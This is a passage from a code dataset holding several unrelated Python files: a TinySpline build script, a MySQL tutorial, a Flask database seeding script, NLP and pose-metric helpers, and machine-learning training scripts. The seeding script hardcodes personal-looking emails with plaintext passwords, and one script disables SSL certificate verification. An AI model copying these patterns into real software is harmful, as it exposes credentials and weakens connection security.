0.3, random_state = 1)\n\nprint(X_train.shape)\nprint(X_test.shape)\n\nprint(y_train.shape)\nprint(y_test.shape)\n","sub_path":"Scikitlearn/scikitlearn.py","file_name":"scikitlearn.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"54748570","text":"from os import path, makedirs, chdir\nimport subprocess\nfrom distutils.core import setup\nfrom distutils.command.build import build as _build\n\ncmake_bin = \"cmake\"\ncmake_dir = \"build-python-distutils\"\ncmake_build_config = \"Release\"\ncmake_build_target = \"_tinysplinepython\"\n\nscript_dir = path.dirname(path.realpath(__file__))\nbuild_dir = script_dir + path.sep + cmake_dir\n\n\nclass BuildWithCmake(_build):\n def run(self):\n # create the build directory if necessary\n if not path.exists(build_dir):\n makedirs(build_dir)\n\n # generate make files\n chdir(build_dir)\n cmake_cmd = [cmake_bin, \"..\",\n \"-DCMAKE_BUILD_TYPE=\" + cmake_build_config]\n if subprocess.call(cmake_cmd) != 0:\n raise EnvironmentError(\"error calling cmake\")\n chdir(script_dir)\n\n # build the python binding\n cmake_cmd = [cmake_bin, \"--build\", build_dir,\n \"--config\", cmake_build_config,\n \"--target\", cmake_build_target]\n if subprocess.call(cmake_cmd) != 0:\n raise EnvironmentError(\"error building project\")\n\n # can't use super() here because _build is an\n # old style class in 2.7\n _build.run(self)\n\n\nsetup(name='tinyspline',\n version='0.1.0.dev',\n description='Python binding for TinySpline',\n long_description='''\n TinySpline is a C library for NURBS, B-Splines and Bezier curves\n (even lines and points) with a modern C++11 wrapper and bindings\n for C#, Java and Python (via Swig). The goal of this project is\n to provide a small library with a minimum set of dependencies\n which is easy and intuitively to use.''',\n author='Marcel Steinbeck',\n author_email='github@retux.de',\n license='MIT',\n url='https://github.com/retuxx/tinyspline',\n platforms='Any',\n cmdclass={'build': BuildWithCmake},\n packages=['tinyspline'],\n package_dir={'tinyspline': cmake_dir + '/library'},\n package_data={'tinyspline': ['*tinysplinepython*']}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"365379193","text":"#pip install mysqlclient\r\nimport MySQLdb\r\n\r\ndef main():\r\n \r\n # Defining and manipulating database\r\n\r\n # Establish database connection\r\n conn = MySQLdb.connect(\"localhost\",\"root\",\"\",\"workshop\")\r\n print('Database Connected Successfully!!')\r\n \r\n # Create a cursor\r\n cur = conn.cursor()\r\n\r\n # Create a table\r\n cur.execute('CREATE TABLE STUDENT\\\r\n (RollNum INT,\\\r\n Name VARCHAR(20),\\\r\n Percentage INT);')\r\n print('Table Created Successfully!!')\r\n \r\n # Inserting data into table\r\n cur.execute(\"INSERT INTO STUDENT VALUES (1, 'Hiten', 89);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (2, 'Muskan', 85);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (3, 'Nidhi', 78);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (4, 'Nikhil', 55);\")\r\n cur.execute(\"INSERT INTO STUDENT VALUES (5, 'Deepti', 95);\")\r\n print('Data Inserted Successfully!!')\r\n\r\n conn.commit()\r\n \r\n # Retrieving data from table\r\n print('Output of Select Queries')\r\n print('Retrieving roll numbers, names, and percentages of students')\r\n cur.execute('SELECT RollNum, Name, Percentage FROM\\\r\n STUDENT;')\r\n print(cur.fetchall())\r\n \r\n print('Retrieving all attribute values of students')\r\n cur.execute('SELECT * FROM STUDENT;')\r\n print(cur.fetchall())\r\n \r\n print('Retrieving roll numbers and names of students')\r\n cur.execute('SELECT RollNum, Name FROM STUDENT;')\r\n print(cur.fetchall())\r\n \r\n print('Retrieving all attribute values of students with\\\r\n percentage greater than 80')\r\n cur.execute('SELECT * FROM STUDENT WHERE Percentage > 80;')\r\n print(cur.fetchall())\r\n\r\n # Close the connection\r\n conn.close()\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"database/MYSQl.py","file_name":"MYSQl.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364346965","text":"import json\nimport sys\ndef readJson(filename):\n with open(filename,'r') as f:\n d=json.load(f)\n return d\n\ndef main():\n args = sys.argv[1]\n people = readJson(args)[\"people\"]\n skills = {}\n for person in people:\n for skill in person[\"skills\"]:\n if skill[\"name\"] in skills:\n if skill[\"level\"] > skills[skill[\"name\"]][0]:\n skills[skill[\"name\"]] = (skill[\"level\"],person[\"first_name\"] + person[\"last_name\"])\n else:\n skills[skill[\"name\"]] = (skill['level'],person[\"first_name\"] + person[\"last_name\"])\n for key,value in skills.items():\n print(key,value[1])\n\nif __name__ == '__main__':\n main() \n","sub_path":"week03/CodingSkills.py","file_name":"CodingSkills.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563667259","text":"from flask_security.utils import encrypt_password\n\nfrom backend import db, app\nfrom backend.models import Building, BuildingImage, Architect, MetroRoute, MetroStation, District, Region, \\\n BuildingNumberFact, BuildingTextFact, Style, ArchitectFact, Element, ElementPlace, ElementExample, User,Role\n\nfrom backend import user_datastore\n\nfrom datetime import datetime\nimport random\n\ntext = '

Жилой дом на Котельнической набережной — одна из «сталинских высоток» в Москве, находится в ' \\\n 'устье реки Яузы по адресу Котельническая набережная № 1/15. Построена в 1938—1952 годах; авторы ' \\\n 'проекта — Д. Н. Чечулин, А. К. Ростковский, инженер Л. М. Гохман. Является памятником ' \\\n 'архитектуры регионального значения.

«Старый», 9-этажный жилой корпус, ' \\\n 'выходящий на Москва-реку, был спроектирован в 1938 году и завершён в 1940-м. Центральный объём ' \\\n 'строился в 1948—1952 годах. Он на��читывает 26 этажей (32 вместе с техническими этажами) и имеет ' \\\n 'высоту 176 м.

Всего в здании находятся 700 квартир, 540 из них расположены в ' \\\n 'центральном объёме (из них 336 двухкомнатных, 173 трёхкомнатных, 18 четырёхкомнатных и 13 ' \\\n 'однокомнатных). Из широких окон квартир на верхних этажах открывается вид на город, Москву-реку ' \\\n 'и Кремль. Также в здании находятся магазины, почтовое отделение, кинотеатр «Иллюзион» (базовый ' \\\n 'кинотеатр Госфильмофонда; выходит на Большой Ватин переулок), музей-квартира Г. С. Улановой (' \\\n 'открылась в 2004 году в кв. № 185 — балерина жила здесь с 1986 года, а ранее, с октября 1952 ' \\\n 'года, занимала квартиру № 316 в корпусе Б).

Помещения общественного назначения, ' \\\n 'такие как овощной (со стороны Подгорной набережной) и кондитерский (торец здания со стороны ' \\\n 'Верхней Радищевской) магазины, существовавшие до начала 2000-х годов, отличались своими ' \\\n 'интерьерами: стены и потолки были богато украшены пышными росписями с изображениями цветочных ' \\\n 'гирлянд и всевозможных даров природы. Входные вестибюли и лифтовые холлы жилых подъездов также ' \\\n 'декорированы барельефами, лепниной и росписями.

Корпус А был изначально заселён ' \\\n 'работниками НКВД[3].

Дом строили советские заключённые и немецкие военнопленные[' \\\n '4][5][6], привлечённые через Главное управления лагерей промышленного строительства (' \\\n 'Главпромстрой)[7]. Согласно воспоминаниям жительницы дома С. Н. Перовской, в 1954 году, ' \\\n 'когда она сюда переехала, на окнах 5-го и 8-го этажей, где были большие карнизы, ' \\\n '«стояли решетки, чтобы не могли выбраться заключённые»[8].

'\n\n\ndef generate_text():\n return ' '.join([\n ''.join([random.choice('абвгдеёжзийклмнопрстуфхцчшщъыьэюя')\n for _ in range(1, random.randint(4, 10))])\n for _ in range(1, random.randint(26, 50))\n ])\n\n\ndef create_db():\n with app.app_context():\n app.logger.info('reflecting db')\n db.reflect()\n\n app.logger.info('dropping db')\n db.drop_all()\n\n app.logger.info('creating db')\n db.create_all()\n\n roles = [\n Role(name=\"user\"),\n Role(name=\"superuser\")\n ]\n db.session.add_all(roles)\n\n user_datastore.create_user(\n first_name='Никита',\n last_name='Кулаков',\n email='kul7nik@gmail.com',\n password=encrypt_password('Kul7nick'),\n roles=roles,\n )\n user_datastore.create_user(\n first_name='Екатерина',\n last_name='Лебедева',\n email='katerlebedevaa@yandex.ru',\n password=encrypt_password('Lasunec123'),\n roles=roles[:1],\n )\n\n routes = [\n MetroRoute(\n color='rgb({0},{1},{2})'.format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),\n name='Ветка #' + str(i)\n ) for i in range(1, 11)\n ]\n\n regions = [\n Region(\n name='Округ #' + str(i),\n abbr='ABBR',\n description=generate_text()[:50]\n ) for i in range(1, 11)\n ]\n\n districts = [\n District(\n name='Район #' + str(i),\n region=regions[(i - 1) // 4],\n description=generate_text()[:50]\n ) for i in range(1, 41)\n ]\n\n stations = [\n MetroStation(\n name='Станция #' + str(i),\n district=districts[i - 1],\n routes=[routes[(i - 1) % len(routes)], routes[i % len(routes)]],\n description=generate_text()[:50]\n ) for i in range(1, 41)\n ]\n\n app.logger.info('creating buildings')\n buildings = [\n Building(\n title='Title #' + i,\n title_info='Some info in title #' + i,\n year_build_start=int(datetime.now().year),\n year_build_end=int(datetime.now().year),\n leading_img_path='visotka.jpg',\n latitude=random.uniform(55.614926, 55.860389),\n longitude=random.uniform(37.416317, 37.772211),\n images=[\n BuildingImage(\n name='image #{}:{}'.format(1, i),\n path='shema.jpg'\n ),\n BuildingImage(\n name='image #{}:{}'.format(2, i),\n path='visota.jpg'\n ),\n BuildingImage(\n name='image #{}:{}'.format(3, i),\n path='visotka.jpg'\n )\n\n ],\n text=text,\n address='address #' + i,\n station=stations[random.randint(0, 39)],\n district=districts[random.randint(0, 39)],\n number_facts=[\n BuildingNumberFact(\n number=j * random.randint(1, 100),\n name='nfact #' + str(j)\n )\n for j in range(1, random.randint(2, 4))\n ],\n text_facts=[\n BuildingTextFact(\n text=generate_text()\n )\n ]\n ) for i in map(str, range(1, 11))\n ]\n\n architects = [\n Architect(name='Name#' + str(i),\n surname='Surname#' + str(i),\n patronymic='Patronymic#' + str(i),\n born=random.choice([1825, 1927, None, 1953]),\n died=random.choice([1825, 1927, None, 1953]),\n alive=random.choice([False, False, False, True]),\n place_of_birth='Place of birth #' + str(i),\n quote=generate_text()[:100],\n text=text,\n img_path='shusev.jpg',\n facts=[\n ArchitectFact(\n name='name#' + str(i),\n text=generate_text()[:60]\n )\n for i in range(1, random.randint(2, 5))\n ],\n square_img='arch-square.png',\n portrait_img='arch-portrait.png',\n landscape_img='arch-landscape.png'\n\n )\n for i in range(1, 20)\n ]\n for i, architect in enumerate(architects):\n if i < len(architects) - 1:\n architect.buildings = [buildings[i % len(buildings)], buildings[(i+1) % len(buildings)]]\n else:\n architect.buildings = [buildings[i % len(buildings)]]\n\n styles = [\n Style(name=\"Стиль #\" + str(i),\n date=random.choice([1800, 1810, 1825, 1840, 1860, 1875]),\n philosophy='philosophy #' + str(i),\n ideology='ideology #' + str(i),\n text=text,\n fact=generate_text(),\n architects=[architects[i - 1], architects[(i * 2) % len(architects)]],\n buildings=[buildings[i - 1]],\n building_img_path='klass-build.svg',\n column_img_path='klass-col.svg',\n door_handle_img_path='klass-door.svg',\n description=generate_text()[:75]\n )\n for i in range(1, 11)\n ]\n for i, style in enumerate(styles):\n if i != 0:\n styles[i].previous = styles[i - 1]\n\n elements = [\n Element(\n name='Element#' + str(i),\n date=random.choice([1800, 1810, 1825, 1840, 1860, 1875]),\n text=text,\n styles=[styles[i - 1], styles[i * 2 % len(styles)]],\n places=[\n ElementPlace(\n name='Element Place #1:' + str(i)\n ),\n ElementPlace(\n name='Element Place #2:' + str(i)\n ),\n ElementPlace(\n name='Element Place #3:' + str(i)\n ),\n ElementPlace(\n name='Element Place #4:' + str(i)\n ),\n ],\n examples=[\n ElementExample(\n img_path='usadba.jpg',\n building=buildings[i - 1]\n ),\n ElementExample(\n img_path='usadba.jpg',\n building=buildings[i * 2 % len(buildings)],\n ),\n ],\n img_path='kartush.svg',\n description=generate_text()[:60]\n )\n for i in range(1, 11)\n ]\n\n db.session.add_all(buildings)\n db.session.add_all(architects)\n db.session.add_all(routes)\n db.session.add_all(stations)\n db.session.add_all(districts)\n db.session.add_all(regions)\n db.session.add_all(styles)\n db.session.add_all(elements)\n\n db.session.commit()\n","sub_path":"backend/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"456318735","text":"import codecs\nfrom dataset.tokenization import BertTokenizer\n\nvocab_path = \"data/vocab.list\"\n\ndef split(path):\n readfile = codecs.open(path)\n writefile = codecs.open(path + 'smooth', mode='w')\n tokenizer = BertTokenizer(vocab_path)\n\n for i in readfile.readlines():\n line = i.strip()\n sub_list = tokenizer.tokenize(line)\n print(sub_list)\n\n new_line, _ = merge_subword(sub_list)\n\n writefile.write(new_line + '\\n')\n\n\ndef merge_subword(subword_list):\n ret_sent = []\n align = []\n index = 0\n prev = \"\"\n for step, word in enumerate(subword_list):\n if \"##\" in word:\n prev += word.strip(\"##\")\n else:\n if prev != \"\":\n ret_sent.append(prev)\n index += 1\n prev = word\n\n align.append(index)\n\n if prev != \"\":\n ret_sent.append(prev)\n\n return \" \".join(ret_sent), align\n\n\nif __name__ == \"__main__\":\n split(\"./final_result/wiki/untswiki\")\n","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"4545766","text":"import numpy as np\nfrom IPython import embed\n\ndef change_pose(points_pre, points_true):\n \"\"\"\n the function is to change the format to (X,Y,Z) , (X,Y,Z) ....\n \"\"\"\n predict = []\n gt = []\n if len(points_pre) > 0:\n for pose in points_pre:\n for i in range(19):\n joint = []\n X = pose[0][i]\n Y = pose[1][i]\n Z = pose[2][i]\n joint.append(i) #joint type\n joint.append(X)\n joint.append(Y)\n joint.append(Z)\n predict.append(joint)\n \n if len(points_true) > 0:\n for pose in points_true:\n for i in range(19):\n joint = []\n X = pose[0][i]\n Y = pose[1][i]\n Z = pose[2][i]\n joint.append(i)\n joint.append(X)\n joint.append(Y)\n joint.append(Z)\n gt.append(joint)\n\n return predict , gt\n\ndef dist(p1, p2, th):\n \"\"\"\n type: (Seq, Seq, float) -> float\n 3D Point Distance\n p1:predict point\n p2:GT point\n th:the max acceptable distance\n return:euclidean distance between the positions of the two joints\n \"\"\"\n if p1[0] != p2[0]:\n return np.nan\n d = np.linalg.norm(np.array(p1[1:]) - np.array(p2[1:]))\n return d if d <= th else np.nan\n\ndef non_minima_suppression(x):\n \"\"\"\n return:non-minima suppressed version of the input array\n supressed values become np.nan\n \"\"\"\n min = np.nanmin(x)\n x[x != min] = np.nan\n if len(x[x == min]) > 1:\n ok = True\n for i in range(len(x)):\n if x[i] == min and ok:\n ok = False\n else:\n x[i] = np.nan\n return x\n\ndef not_nan_count(x):\n \"\"\"\n :return: number of not np.nan elements of the array\n 返回的是一个数\n \"\"\"\n return len(x[~np.isnan(x)])\n\n\n\ndef joint_det_metrics(points_pre, points_true, th=7.0):\n \"\"\"\n points_pre : the predict poses in camera coordinate\n points_true: the gt-truth poses in camera coordinate\n th:distance threshold; all distances > th will be considered 'np.nan'.\n return : a dictionary of metrics, 'met', related to joint detection;\n the the available metrics are:\n (1) met['tp'] = number of True Positives\n (2) met['fn'] = number of False Negatives\n (3) met['fp'] = number of False Positives\n (4) met['pr'] = PRecision\n (5) met['re'] = REcall\n (6) met['f1'] = F1-score\n \"\"\"\n predict, gt = change_pose(points_pre=points_pre, points_true=points_true)\n if len(predict) > 0 and len(gt) > 0:\n mat = []\n for p_true in gt:\n row = np.array([dist(p_pred, p_true, th=th) for p_pred in predict])\n mat.append(row)\n mat = np.array(mat)\n mat = np.apply_along_axis(non_minima_suppression, 1, mat)\n mat = np.apply_along_axis(non_minima_suppression, 0, mat)\n\n # calculate joint detection metrics\n nr = np.apply_along_axis(not_nan_count, 1, mat)\n tp = len(nr[nr != 0]) #number of true positives / 预测出来并且存在于真值中\n fn = len(nr[nr == 0]) #number of false negatives / 没有预测出来\n fp = len(predict) - tp #预测出来但是并不对\n pr = tp / (tp+fp)\n re = tp / (tp+fn)\n f1 = (2 * tp) / (2 * tp + fn + fp)\n\n elif len(predict) == 0 and len(gt) == 0:\n tp = 0 #number of true positives\n fn = 0 #number of false negatives\n fp = 0 #number of false positive\n pr = 1.0\n re = 1.0\n f1 = 1.0\n elif len(predict) == 0:\n tp = 0\n fn = len(gt)\n fp = 0\n pr = 0.0\n re = 0.0\n f1 = 0.0\n else:\n tp = 0\n fn = 0\n fp = len(predict)\n pr = 0.0\n re = 0.0\n f1 = 0.0\n\n metrics = {\n 'tp':tp, 'fn':fn, 'fp':fp,\n 'pr':pr, 're':re, 'f1':f1,\n }\n\n return metrics","sub_path":"lib/test_metric.py","file_name":"test_metric.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"458687577","text":"import pickle\nimport numpy as np\nimport os\nimport json\nfrom random import shuffle\nimport sys\nfrom decoder import Decoder\nsys.path.append('..')\nfrom config import data_path, experiment_id\nfrom tqdm import tqdm\n\nclass Evaluator:\n def __init__(self):\n self.decoder = Decoder()\n\n def evaluate(self, samples=200):\n \"\"\"\n Run decoding with decoder with a fixed number of pairs from evaluation set.\n\n :param samples:\n :return:\n \"\"\"\n best_hit = 0\n n_best_hit = 0\n\n with open('eval_log_e{}.txt'.format(experiment_id), 'w', encoding='utf-8') as f:\n x_, y_ = self.load_eval_set()\n for x, y in tqdm(zip(x_[:samples], y_[:samples])):\n results = self.decoder.decode(x)\n # convert to list of strings\n sentences = [''.join([x.split('/')[0] for x in item[1]]) for item in results]\n if y == sentences[0]:\n best_hit += 1\n f.write('best hit\\n')\n elif y in sentences:\n f.write('nbest hit\\n')\n n_best_hit += 1\n else:\n f.write('no hit\\n')\n\n f.write('{}\\t{}\\n'.format(y, x))\n for item in sentences:\n f.write('{}\\n'.format(item))\n\n f.write('best_hit {} nbest_hit{} no_hit {} samples {}'.format(best_hit, n_best_hit, samples-best_hit-n_best_hit, samples))\n print('best_hit {} nbest_hit{} no_hit {} samples {}'.format(best_hit, n_best_hit, samples-best_hit-n_best_hit, samples))\n\n def load_eval_set(self, debug=True):\n \"\"\"\n Read the test portion of the corpus.\n\n :return: Reading and sentence pairs. The sentences that contains oov will be removed.\n \"\"\"\n def has_oov(tokens):\n for token in tokens:\n if '':\n # start of current sentence\n if len(tokens) > 0 and not has_oov(tokens):\n # print(tokens)\n readings = [x.split('/')[1] if x.split('/')[1] != '' else x.split('/')[0] for x in tokens]\n words = [x.split('/')[0] for x in tokens]\n x.append(''.join(readings))\n y.append(''.join(words))\n\n tokens = []\n\n else:\n tokens.append(token)\n\n print('{} pairs load'.format(len(x)))\n\n return x, y\n\nif __name__ == '__main__':\n eval = Evaluator()\n eval.evaluate()","sub_path":"decoder/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"431258596","text":"\n\nfrom xai.brain.wordbase.verbs._out import _OUT\n\n#calss header\nclass _OUTED(_OUT, ):\n\tdef __init__(self,): \n\t\t_OUT.__init__(self)\n\t\tself.name = \"OUTED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"out\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_outed.py","file_name":"_outed.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"466763262","text":"import pandas as pd\r\nimport numpy as np\r\nimport ssl\r\nssl._create_default_https_context = ssl._create_unverified_context\r\ncolumn_names=[\"Sample code number\",\"Clump Thickness\",\"Uniformity of Cell Size\" ,\r\n \"Uniformity of Cell Shape\",\"Marginal Adhesion\",\"Single Epithelial Cell Size\",\r\n \"Bare Nuclei\",\"Bland Chromatin\", \"Normal Nucleoli\", \"Mitoses\",\"Class\"]\r\ndata=pd.read_csv(r\"https://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/breast-cancer-wisconsin.data\",names=column_names)\r\n#data=pd.read_csv(r\"C:\\Users\\dell\\Desktop\\test\\breastCancer.csv\",names=column_names)\r\ndata=data.replace(to_replace=\"?\",value=np.nan)\r\ndata.head(20)\r\ndata=data.dropna(how='any')\r\ndata.shape\r\nfrom sklearn.cross_validation import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(data[column_names[1:10]],data[column_names[10]],test_size=0.25,random_state=33)\r\ny_test.value_counts()\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.linear_model import SGDClassifier\r\n## standardize the data\r\n## for training data,fit the parameters\r\n## for test data,use the parameters fiteds directly\r\nss=StandardScaler()\r\nX_train=ss.fit_transform(X_train)\r\nX_test=ss.transform(X_test)\r\n# use the logistic Regression to get the parameters \r\nlr=LogisticRegression()\r\nlr.fit(X_train,y_train)\r\nlr_y_predict=lr.predict(X_test)\r\n# use the sgdc methode to get the parameters\r\nsgdc=SGDClassifier()\r\nsgdc.fit(X_train,y_train)\r\nsgdc_y_predict=sgdc.predict(X_test)\r\n# Analyse the result of the calssificaiton: Precision and Recall\r\nfrom sklearn.metrics import classification_report\r\nprint(\"Accuracy of lr classifier\",lr.score(X_test,y_test))\r\nprint(classification_report(y_test,lr_y_predict,target_names=[\"bengin\",\"malignant\"]))\r\n# Analyse the result of SGD classfier\r\nprint(\"Accuarcy of SGD Classfier:\",sgdc.score(X_test,y_test))\r\nprint(classification_report( y_test,sgdc_y_predict,target_names=[\"benign\",\"malignant\"]))\r\n\"\"\"\r\nThe first methode can give the analytical solution of the parameters lgistic regression model\r\nwhich is more accurate but it takes more time \r\nThe seconde methde can give a solution calculted with the methode sgd \r\nwhich is more powerfull for the big data\r\n\"\"\"\r\n\r\n## The first methode can give the analytical solution of the parameters lgistic regression model\r\n## which is more accurate but it takes more time \r\n## The seconde methde can give a solution calculted with the methode sgd \r\n## which is more powerfull for the big data\r\n\r\n","sub_path":"classicMachineLearning/LinearRegression_BreastCancerPrediction.py","file_name":"LinearRegression_BreastCancerPrediction.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"522322797","text":"import json\nn=12\nssarr=[]\nnumattarr=[]\nsumattarr=[]\navattarr=[]\nfor k in range(n+1): \n with open(\"num_vars=\"+str(n)+\"_depth=\"+str(k)+\".json\") as data:\n loaded=json.load(data)\n ss=[0]*len(loaded)\n numatt=[0]*len(loaded)\n sumatt=[0]*len(loaded)\n avatt=[]\n for i,dds in enumerate(loaded):\n tempss=0\n tempnumatt=0\n tempsumatt=0\n tempavatt=0\n for attbas in dds:\n att=attbas[0]\n if(att==1):\n tempss+=1\n tempnumatt+=1\n tempsumatt+=att\n avatt.append(att)\n ss[i]=tempss\n numatt[i]=tempnumatt\n sumatt[i]=tempsumatt\n sscnt=[]\n numcnt=[]\n sumcnt=[]\n avcnt=[]\n for j in range(min(ss),max(ss)+1):\n if((ss.count(j)+0.0)/len(loaded)>0):\n sscnt.append([j,(ss.count(j)+0.0)/len(loaded)])\n for j in range(min(numatt),max(numatt)+1):\n if((numatt.count(j)+0.0)/len(loaded)>0):\n numcnt.append([j,(numatt.count(j)+0.0)/len(loaded)])\n for j in range(min(sumatt),max(sumatt)+1):\n if((sumatt.count(j)+0.0)/len(loaded)>0):\n sumcnt.append([j,(sumatt.count(j)+0.0)/len(loaded)])\n for j in range(min(avatt),max(avatt)+1):\n if((avatt.count(j)+0.0)/len(loaded)>0):\n avcnt.append([j,(avatt.count(j)+0.0)/len(loaded)])\n ssarr.append(sscnt)\n numattarr.append(numcnt)\n sumattarr.append(sumcnt)\n avattarr.append(avcnt)\nwith open(\"mathematica_data_n.json\", \"w+\") as output:\n json.dump(ssarr,output)\nwith open(\"mathematica_data_m.json\", \"w+\") as output:\n json.dump(numattarr,output)\nwith open(\"mathematica_data_o.json\", \"w+\") as output:\n json.dump(sumattarr,output)\nwith open(\"mathematica_data_p.json\", \"w+\") as output:\n json.dump(avattarr,output)\n","sub_path":"data/temp_analysis.py","file_name":"temp_analysis.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"564385560","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAsks the user for a string and print out whether this string is a\npalindrome or not.\n\nCreated on Thu Mar 1 22:49:48 2018\n\n@author: Abdallah Emad\n\"\"\"\n\nword = input('Please enter a word: ')\nprint('Great!, the word {0} is palindrome'.format(word)\n if word == word[::-1]\n else 'Sorry!, the word {0} is not palindrome'.format(word))\n","sub_path":"string_lists.py","file_name":"string_lists.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"613898748","text":"from dataset import MicroscopyDataset, RandomResizedCrop, RandomRotation, RandomFlip, ToTensor, ExtendImageChannel, vis_res\nfrom res_unet import resnet18_UNet\nfrom loss_metric import DiceLoss\n\nimport os\nimport time\nimport json\nimport torch\nimport logging\nimport numpy as np\nfrom torchvision import transforms\n\n\ndef do_epoch(args, epoch, net, dataset, optimizer, eval=False, K=30000):\n dataloader = torch.utils.data.DataLoader(dataset, \n batch_size=args.batchsize if not eval else 1, \n shuffle=not eval, \n num_workers=0, \n drop_last=False\n )\n net = net.train(not eval)\n\n epoch_loss = 0.0\n epoch_acc = 0.0\n epoch_hem_loss = 0.0\n for iter, data in enumerate(dataloader):\n img, mask = data\n img = img.float().cuda() if args.use_cuda else img.float().cpu()\n if mask is not None:\n mask = mask.float().cuda() if args.use_cuda else mask.float().cpu()\n pred = net(img)\n loss_dice = net.loss(pred, mask)\n loss_map = net.boundaryloss(pred, mask)\n\n if not eval:\n loss_map_flat = loss_map.reshape(args.batchsize, -1)\n else:\n loss_map_flat = loss_map.reshape(1, -1)\n\n loss_hem = loss_map_flat.topk(K, dim=-1)[0].mean()\n \n if epoch > (args.epoch/2):\n w_boundary = 0.0000005\n else:\n w_boundary = 0\n \n loss = loss_dice + (w_boundary * loss_hem)\n acc = net.metric(pred.detach(), mask.detach())\n epoch_loss += loss.item()\n epoch_hem_loss += (w_boundary * loss_hem).item()\n epoch_acc += acc.item()\n\n if not eval:\n loss.backward()\n optimizer.step()\n\n if eval:\n title = 'acc={}'\n prob = torch.sigmoid(torch.max(pred[0,:,:,:],0)[0])\n vis_res(img[0,:,:,:].permute(1, 2, 0), mask[0,0,:,:], loss_map[0,0,:,:], prob>0.5, save_path='./epoch_{}_iter_{}.png'.format(epoch, iter), title=None)\n\n return epoch_loss / iter, epoch_acc / iter, epoch_hem_loss / iter\n \n\n\ndef run(args):\n # init model\n if args.enable_resnet_pretrain:\n net = resnet18_UNet(pretrained=not args.resume, n_class=1, input_size=256)\n if args.resume:\n net.load_state_dict(torch.load(args.resume_model_path), strict=True)\n else:\n net = resnet18_UNet(pretrained=False, n_class=1, input_size=256)\n \n net.loss = DiceLoss()\n net.boundaryloss = torch.nn.BCEWithLogitsLoss(reduction='none')\n net.metric = DiceLoss(get_coefficient=True)\n\n if args.use_cuda:\n net = net.cuda()\n \n # init optimizer\n optimizer = torch.optim.Adam(net.parameters(), lr=args.lr, betas=(0.9, 0.999))\n\n # init dataloader\n train_transforms = transforms.Compose([\n RandomRotation(),\n RandomResizedCrop(size=args.training_patch_size),\n RandomFlip(),\n ToTensor(),\n ExtendImageChannel(),\n ])\n train_dataset = MicroscopyDataset(args.dataset_root, args.dataset_train_list, transform=train_transforms)\n val_dataset = MicroscopyDataset(args.dataset_root, args.dataset_val_list, transform=train_transforms)\n logging.info('Train set size:{}, Val set size:{}'.format(len(train_dataset), len(val_dataset)))\n\n logging.info('Start training...')\n for epoch in range(args.epoch):\n time1 = time.time()\n loss, acc, hem_loss = do_epoch(args, epoch, net, train_dataset, optimizer)\n time2 = time.time()\n logging.info('epoch [{}/{}], time elapse={:.2f}, loss={:.4f}, train_acc={:.4f}, hem_loss={:.4f}'.format(epoch, args.epoch, time2-time1, loss, acc, hem_loss))\n\n if epoch % args.eval_freq == 0:\n logging.info('Evaluate model...')\n loss, acc, hem_loss = do_epoch(args, epoch, net, val_dataset, None, eval=True)\n logging.info('val_loss={:.4f}, val_acc={:.4f}, hem_loss={:.4f}'.format(loss, acc, hem_loss))\n \n logging.info('Finish training...')\n\n\nif __name__ == '__main__':\n def bool_str(x):\n return str(x).lower() in ['True', 'true', '1'] \n \n import configargparse\n parser = configargparse.ArgParser()\n \n parser.add_argument('--dataset-root', type=str, required=True)\n parser.add_argument('--training-patch-size', default=512, type=int, help='image crop size during training')\n parser.add_argument('--dataset-train-list', type=str, required=True)\n parser.add_argument('--dataset-val-list', type=str, required=True)\n \n parser.add_argument('--lr', default=0.001, type=float, help='learning rate')\n parser.add_argument('--epoch', default=10, type=int, help='learning epochs')\n parser.add_argument('--batchsize', default=5, type=int, help='batch size during training')\n parser.add_argument('--eval-freq', default=1, type=int, help='to evaluate and visualize at every X epochs')\n \n parser.add_argument('--enable-resnet-pretrain', type=bool_str, required=True)\n parser.add_argument('--resume', default=False, type=bool_str, help='load weights from a specified model')\n parser.add_argument('--resume-model-path', type=str)\n\n parser.add_argument('--use-cuda', default=True, type=bool_str)\n \n args = parser.parse_args()\n args.training_patch_size = [args.training_patch_size, args.training_patch_size]\n\n 